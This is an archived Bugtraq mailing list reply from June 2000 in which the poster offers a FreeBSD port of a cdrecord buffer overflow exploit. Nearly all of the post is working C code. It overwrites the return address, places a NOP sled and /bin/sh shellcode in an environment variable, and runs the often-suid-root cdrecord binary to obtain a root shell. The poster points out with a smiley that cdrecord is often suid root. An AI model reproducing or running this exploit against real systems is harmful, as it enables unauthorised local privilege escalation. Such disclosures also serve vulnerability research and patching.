[15303] in bugtraq
Re: Mandrake 7.0: /usr/bin/cdrecord gid=80 (strike #2)
daemon@ATHENA.MIT.EDU (sector x)
Sat Jun 10 16:33:46 2000
Message-Id: <20000610163613.16146.qmail@securityfocus.com>
Date: Sat, 10 Jun 2000 16:36:13 -0000
Reply-To: sector x <sectorx@DIGITALPHOBIA.COM>
From: sector x <sectorx@DIGITALPHOBIA.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <392FEB2E.10996FFD@gsu.linux.org.tr>
Here is a freebsd port of noir's cdrecord buffer overflow.
have you noticed cdrecord is very often suid root on many
systems? :)
--sectorx
-- snip snip --
/* freebsd cdrecord exploit port by sectorx of XOR
(http://xorteam.cjb.net) */
#include <stdio.h>
#include <stdlib.h>
#define LENGTH 76
#define EGGIE 500
long esp() { __asm__("movl %esp, %eax"); }
char devilspawn[];
int main(int argc, char *argv[])
{
long addr;
char buf[LENGTH];
char egg[EGGIE];
int i,offset;
printf("cdrecord exploit by sectorx (FreeBSD)\n");
if (argc < 2) {
printf("error: offset must be supplied as a
parameter\n");
printf("*note* FreeBSD 3.3-RELEASE\'s offset is
600\n\n");
return;
}
offset = atoi(argv[1]);
addr = esp()+offset;
printf("Using offset 0x%x [%d], eip =
0x%x\n",offset,offset,addr);
/* build the overflow string */
for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr;
buf[LENGTH-1] = '\0';
/* build the egg string */
memset(&egg,0x90,sizeof(egg));
memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn));
egg[EGGIE-1] = '\0';
setenv("EGG",egg,1);
execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0);
}
/* FreeBSD shellcode by mudge of L0pht */
char devilspawn[]=
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
